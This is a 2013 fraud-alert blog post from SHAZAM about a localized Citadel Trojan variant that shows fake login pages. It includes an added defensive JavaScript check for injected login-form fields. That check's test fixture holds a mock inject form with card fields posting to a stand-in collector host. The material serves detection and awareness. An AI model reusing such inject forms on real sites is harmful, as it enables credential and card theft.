September 4, 2013 by Jim Ghiglieri — Senior Vice President, Corporate Communications, SHAZAM
A new variant of Citadel Trojan malware has surfaced in the last few weeks, and it's targeting not only financial institutions, but also social networks and e-commerce websites such as Amazon.
The malware is downloaded after credentials and other personal data, such as payment card information, are entered. It is believed the criminals are stockpiling this information for resale to other fraudsters.
The malware triggers when an infected computer browses to a target site. The victim is then shown an HTML injection that looks like a legitimate log-on page. The screen contains localized content, automatically customized for the language of each market and brand being targeted.
The scam used by the injection page is a message claiming that there has been suspicious activity detected on an Amazon account, for example, and that the account has been blocked. Even the dropdown menus and warnings are localized with specific data elements for different geographies.
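The inject described above changes what the browser renders without changing what the server sent: extra fields (card number, expiry, CVV) appear on a page that should only ask for a username and password, and the form may be repointed to a collection server. One defender-side check that follows from that is to have the site's own reporting script snapshot the rendered login form and compare it with the form the site actually serves. The code below is an added example written for this page, not SHAZAM's or the Citadel authors' code; the function names, the baseline format, and both HTML samples are constructed assumptions.

```javascript
// Added example (not from the original post): compare a rendered login form
// with the form the site intends to serve, and flag injected fields or a
// form action that points off-origin. Assumes the site's page carries a small
// reporting script that posts a DOM snapshot back for comparison; the HTML
// samples and the site origin below are constructed placeholders.

const INPUT_TAG = /<input\b([^>]*)>/gi;

// Pull one attribute value (lower-cased) out of a tag's attribute string.
function attr(attrs, name) {
  const re = new RegExp(`(?:^|\\s)${name}\\s*=\\s*["']([^"']*)["']`, "i");
  const m = re.exec(attrs);
  return m ? m[1].trim().toLowerCase() : null;
}

// Describe a form: sorted names of user-visible input fields (hidden and
// submit controls excluded) plus the form action, if any.
function describeForm(html) {
  const fields = [];
  for (const m of html.matchAll(INPUT_TAG)) {
    const type = attr(m[1], "type") || "text";
    const name = attr(m[1], "name");
    if (!name || type === "hidden" || type === "submit") continue;
    fields.push(name);
  }
  const action = /<form\b[^>]*\baction\s*=\s*["']([^"']*)["']/i.exec(html);
  return { fields: fields.sort(), action: action ? action[1] : null };
}

// Audit an observed page against the baseline the site serves. Any field the
// baseline does not list, or an action resolving to another origin, is flagged.
function auditLoginForm(observedHtml, baseline) {
  const observed = describeForm(observedHtml);
  const allowed = new Set(baseline.fields);
  const unexpectedFields = observed.fields.filter((f) => !allowed.has(f));
  let foreignAction = false;
  if (observed.action) {
    try {
      foreignAction = new URL(observed.action, baseline.origin).origin !== baseline.origin;
    } catch {
      foreignAction = true; // unparseable action: treat as suspicious
    }
  }
  return {
    unexpectedFields,
    foreignAction,
    suspicious: unexpectedFields.length > 0 || foreignAction,
  };
}

// Constructed baseline: the login form as the site actually serves it.
const BASELINE = {
  origin: "https://shop.example", // placeholder origin for the protected site
  fields: ["password", "username"],
};

// Constructed sample: the clean page.
const CLEAN_PAGE = `
<form action="/login" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="hidden" name="csrf" value="token">
  <input type="submit" value="Sign in">
</form>`;

// Constructed sample: the same page after a web inject added a "suspicious
// activity" notice, card-data fields, and repointed the form off-origin.
const INJECTED_PAGE = `
<div class="warning">Suspicious activity detected. Your account is blocked.</div>
<form action="https://collector.example.invalid/submit" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="text" name="cardnumber">
  <input type="text" name="expiry">
  <input type="text" name="cvv">
</form>`;

if (typeof require !== "undefined" && require.main === module) {
  console.log("clean:", auditLoginForm(CLEAN_PAGE, BASELINE));
  console.log("injected:", auditLoginForm(INJECTED_PAGE, BASELINE));
}
```

The check is deliberately an allowlist: the site knows which fields its login form has, so anything else is reportable, whatever label the inject gives it. Because the comparison runs on the rendered DOM, it catches modifications made in the browser that never appear in server logs; the reports themselves are a useful early signal that customers' machines are infected.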
Clearly, these are not novices. The Citadel authors are apparently talented multilinguists, having created scripts in Italian, Spanish, French and German. The group keeps a low profile and controls distribution carefully.
The criminal enterprise has devoted a great deal of effort to protecting its store of stolen data and to making its malware difficult to research.
These hackers have gone beyond just purchasing a version of the Citadel malware. They've taken the necessary steps to convert it, make it sustainable, and localize it.
It's important to understand that despite high-profile botnet takedowns, Citadel and other malware families continue to be profitable and have longevity.
Now is a good time to step up customer education regarding ongoing cyber threats. Remind your employees and customers to stay vigilant and to exercise caution and skepticism if questionable pages crop up.
Because most victims are said to have been infected after downloading the malware, it's important to remind your employees and customers not to initiate downloads from sources they don't know.
Taking that a step further, they should even be suspicious of download prompts from sources they do know, as fraudsters are becoming particularly good at hijacking email addresses from representatives of trusted brands.